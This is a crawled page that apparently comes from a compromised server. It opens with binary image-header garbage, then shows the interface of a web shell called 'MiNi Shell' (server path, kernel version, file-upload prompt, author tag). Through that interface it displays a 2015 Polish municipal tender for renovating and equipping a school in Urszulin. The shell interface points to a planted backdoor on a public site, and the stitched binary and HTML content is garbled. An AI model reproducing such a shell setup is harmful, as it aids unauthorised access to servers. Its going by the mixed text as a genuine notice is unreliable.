JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151023/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151023/155329-N-2015.html

<p class="kh_header"><b>Urszulin: Remont  pomieszczenia świetlicy w budynku kompleksu szkolnego w Urszulinie oraz  dostawa wyposażenia meblowego  oraz  elektronicznego w ramach zadania  Modernizacja i wyposażenie Zespołu Szkół w Urszulinie.</b><br>
<b>Numer ogłoszenia: 155329 - 2015; data zamieszczenia: 23.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Urszulin , ul. Kwiatowa 35, 22-234 Urszulin, woj. lubelskie, tel. 082 5713001, faks 082 5713001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugurszulin.bip.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont  pomieszczenia świetlicy w budynku kompleksu szkolnego w Urszulinie oraz  dostawa wyposażenia meblowego  oraz  elektronicznego w ramach zadania  Modernizacja i wyposażenie Zespołu Szkół w Urszulinie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont  pomieszczenia świetlicy w budynku kompleksu szkolnego w Urszulinie oraz na dostawę wyposażenia meblowego  oraz  elektronicznego w ramach zadania  Modernizacja i wyposażenie Zespołu Szkół w Urszulinie  do wykonania w trzech  zadaniach inwestycyjnych.

ZADANIE NR 1

REMONT  POMIESZCZENIA ŚWIETLICY 

Przedmiotem zamówienia są prace budowlane związane z remontem pomieszczenia świetlicy w budynku Zespołu Szkół w Urszulinie (ul. Szkolna 23). Prowadzone w ramach zadania Modernizacja i wyposażenie Zespołu Szkół w Urszulinie. W ramach zamówienia należy wykonać kompleksowy remont pomieszczenia  świetlicy, a w tym:
1.	Wykonać prace rozbiórkowe polegające na usunięciu okładzin ścian z płytek, posadzek z wykładzin z tworzyw sztucznych
2.	Wykonać demontaż  istniejących  drzwi wraz z ościeżnicami i montaż nowych oraz  dokonać demontażu instalacji sanitarnych (baterii umywalek) wraz z podejściami.
3.	Wykonać wyrównywanie  tynków, położyć gładzie i pomalować
4.	Wykonać nowe posadzki z wykładzin PCV zgrzewanych. 
W trakcie wykonywania robót Wykonawca musi przewidzieć konieczność
- dostosowania prac i odpowiedniego ich zabezpieczenia przed personelem i uczniami szkoły (prace będą wykonywane w czasie trwania roku szkolnego).
- prace muszą być prowadzone tak aby zabezpieczyć pozostałe pomieszczenia i budynki kompleksu szkolnego przed hałasem, uszkodzeniami  i zanieczyszczeniem.  Ewentualnie powstałe  uszkodzenia Wykonawca ma obowiązek naprawić na własny koszt. Szczególną uwagę należy zwrócić na nowo zamontowane okna, oraz instalacje c.o.
- materiały rozbiórkowe i ewentualnie powstałe w czasie wykonywania prac odpady i śmieci Wykonawca ma obowiązek przeznaczyć do recyklingu bądź  zutylizować na własny koszt, a dokumenty potwierdzające wykonanie tych czynności przedstawić Inwestorowi.
- ewentualne korzystanie podczas wykonywania prac przez Wykonawcę z energii elektrycznej z przyłącza Zespołu Szkół w Urszulinie będzie odpłatne. Rozlicznie będzie się odbywało na podstawie odczytu podlicznika,  który zapewni Wykonawca, bądź ryczałtowo na podstawie ceny umownej. 
- Wykonawca przed złożeniem oferty ma obowiązek zapoznać się bezpośrednio ze stanem technicznym  i usytuowaniem obiektów w których będą wykonywane prace.

Szczegółowy opis przedmiotu zamówienia zawarty jest w  przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ.
                                                                ZADANIE NR 2
DOSTAWA MEBLI  DO  SAL I PRACOWNI  ZESPOŁU SZKÓŁ W URSZULINIE.
Przedmiotem zamówienia są dostawy związane z  wyposażeniem w meble sal i oddziałów przedszkolnych, klas edukacji wczesnoszkolnej, klasopracowni i przedszkola   w Zespole Szkół w Urszulinie ul. Szkolna 23, 22-234 Urszulin..
Szczegółowy opis przedmiotu zamówienia zawarty jest  w  opisie i zestawieniu wyposażenia meblowego stanowiącym Załącznik Nr 5 do SIWZ  oraz  przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ.
ZADANIE NR 3
DOSTAWA WYPOSAŻENIA ELEKTRONICZNEGO  DO  PRACOWNI  ZESPOŁU SZKÓŁ W URSZULINIE.
Przedmiotem zamówienia są dostawy związane z  wyposażeniem w sprzęt elektroniczny  pracowni  w Zespole Szkół w Urszulinie ul. Szkolna 23, 22-234 Urszulin.
Szczegółowy opis przedmiotu zamówienia zawarty jest  w  opisie i zestawieniu wyposażenia elektronicznego stanowiącym Załącznik Nr 5 do SIWZ  oraz  przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.23.00.00-0, 39.10.00.00-3, 39.16.00.00-1, 45.00.00.00-7, 45.43.20.00-4, 45.41.00.00-4, 45.44.21.10-1, 45.43.21.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnianie tego warunku, jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert o dopuszczenie do udziału w postępowaniu, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie wykonał a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, wykonał jedną usługę polegającą na dostawie wyposażenia meblowego  lub elektronicznego z podaniem  wartości,  daty wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że dostawy zostały wykonane należycie  o wartości  co najmniej 50000,00 zł brutto dotyczy zadania nr 2 oraz o wartości jednostkowej dostawy, co najmniej 70000,00 zł brutto dotyczy zadania nr 3.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - dodatkowa długość okresu gwarancji w przedziale od 1 do 24 miesięcy - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian istotnych postanowień umowy 
w stosunku do treści oferty, na podstawie której dokonany zostanie wybór wykonawcy:
a) zmiany osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej takimi samymi uprawnieniami.
b) zmiany podwykonawcy, przy pomocy którego Wykonawca realizuje przedmiot umowy 
na innego legitymującego się takimi samymi kwalifikacjami /doświadczeniem zawodowym po uprzedniej akceptacji Zamawiającego.
c) zmiany terminów wykonania zamówienia z przyczyn zewnętrznych /np. warunki atmosferyczne/ niezależnych od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia prac. Termin wykonania umowy może wówczas ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania przedmiotu umowy w sposób należyty. 
Zamawiający dopuszcza zmianę wynagrodzenia tylko w następujących przypadkach:
a)wystąpienia robót zamiennych,
b)rezygnacji z realizacji części robót,
c)wystąpienia robót dodatkowych,
d)zmiany stawki podatku VAT wynikającej z obowiązującego prawa.
Zamawiający może nie wyrazić zgody na dokonanie zmian postanowień umowy, jeżeli proponowana zmiana może wpłynąć na opóźnienie lub obniżenie jakości przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugurszulin.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Urszulin
22-234 Urszulin, ul. Kwiatowa 35.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.11.2015 godzina 12:00, miejsce: Sekretariat Urzędu Gminy Urszulin
22-234 Urszulin, ul. Kwiatowa 35.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt finansowany jest  ze środków Regionalnego Programu Operacyjnego Województwa Lubelskiego  na lata 2007 - 2013, Oś Priorytetowa VIII Infrastruktura Społeczna. Działanie 8.2.  Infrastruktura szkolna i sportowa RPO WL..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> REMONT  POMIESZCZENIA ŚWIETLICY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są prace budowlane związane z remontem pomieszczenia świetlicy w budynku Zespołu Szkół w Urszulinie (ul. Szkolna 23). Prowadzone w ramach zadania Modernizacja i wyposażenie Zespołu Szkół w Urszulinie. W ramach zamówienia należy wykonać kompleksowy remont pomieszczenia  świetlicy, a w tym:
1.	Wykonać prace rozbiórkowe polegające na usunięciu okładzin ścian z płytek, posadzek z wykładzin z tworzyw sztucznych
2.	Wykonać demontaż  istniejących  drzwi wraz z ościeżnicami i montaż nowych oraz  dokonać demontażu instalacji sanitarnych (baterii umywalek) wraz z podejściami.
3.	Wykonać wyrównywanie  tynków, położyć gładzie i pomalować
4.	Wykonać nowe posadzki z wykładzin PCV zgrzewanych. 
W trakcie wykonywania robót Wykonawca musi przewidzieć konieczność
- dostosowania prac i odpowiedniego ich zabezpieczenia przed personelem i uczniami szkoły (prace będą wykonywane w czasie trwania roku szkolnego).
- prace muszą być prowadzone tak aby zabezpieczyć pozostałe pomieszczenia i budynki kompleksu szkolnego przed hałasem, uszkodzeniami  i zanieczyszczeniem.  Ewentualnie powstałe  uszkodzenia Wykonawca ma obowiązek naprawić na własny koszt. Szczególną uwagę należy zwrócić na nowo zamontowane okna, oraz instalacje c.o.
- materiały rozbiórkowe i ewentualnie powstałe w czasie wykonywania prac odpady i śmieci Wykonawca ma obowiązek przeznaczyć do recyklingu bądź  zutylizować na własny koszt, a dokumenty potwierdzające wykonanie tych czynności przedstawić Inwestorowi.
- ewentualne korzystanie podczas wykonywania prac przez Wykonawcę z energii elektrycznej z przyłącza Zespołu Szkół w Urszulinie będzie odpłatne. Rozlicznie będzie się odbywało na podstawie odczytu podlicznika,  który zapewni Wykonawca, bądź ryczałtowo na podstawie ceny umownej. 
- Wykonawca przed złożeniem oferty ma obowiązek zapoznać się bezpośrednio ze stanem technicznym  i usytuowaniem obiektów w których będą wykonywane prace.

Szczegółowy opis przedmiotu zamówienia zawarty jest w  przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.43.20.00-4, 45.41.00.00-4, 45.44.21.10-1, 45.43.21.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. dodatkowa długość okresu gwarancji w przedziale od 1 do 24 miesięcy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> DOSTAWA MEBLI  DO  SAL I PRACOWNI  ZESPOŁU SZKÓŁ W URSZULINIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy związane z  wyposażeniem w meble sal i oddziałów przedszkolnych, klas edukacji wczesnoszkolnej, klasopracowni i przedszkola   w Zespole Szkół w Urszulinie ul. Szkolna 23, 22-234 Urszulin..
Szczegółowy opis przedmiotu zamówienia zawarty jest  w  opisie i zestawieniu wyposażenia meblowego stanowiącym Załącznik Nr 5 do SIWZ  oraz  przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.16.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. dodatkowa długość okresu gwarancji w przedziale od 1 do 24 miesięcy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> DOSTAWA WYPOSAŻENIA ELEKTRONICZNEGO  DO  PRACOWNI  ZESPOŁU SZKÓŁ W URSZULINIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy związane z  wyposażeniem w sprzęt elektroniczny  pracowni  w Zespole Szkół w Urszulinie ul. Szkolna 23, 22-234 Urszulin.
Szczegółowy opis przedmiotu zamówienia zawarty jest  w  opisie i zestawieniu wyposażenia elektronicznego stanowiącym Załącznik Nr 5 do SIWZ  oraz  przedmiarach robót  - stanowiącym Załącznik Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.23.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. dodatkowa długość okresu gwarancji w przedziale od 1 do 24 miesięcy - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com